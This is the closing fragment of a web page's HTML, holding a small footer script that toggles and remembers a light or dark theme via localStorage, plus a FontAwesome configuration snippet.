        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
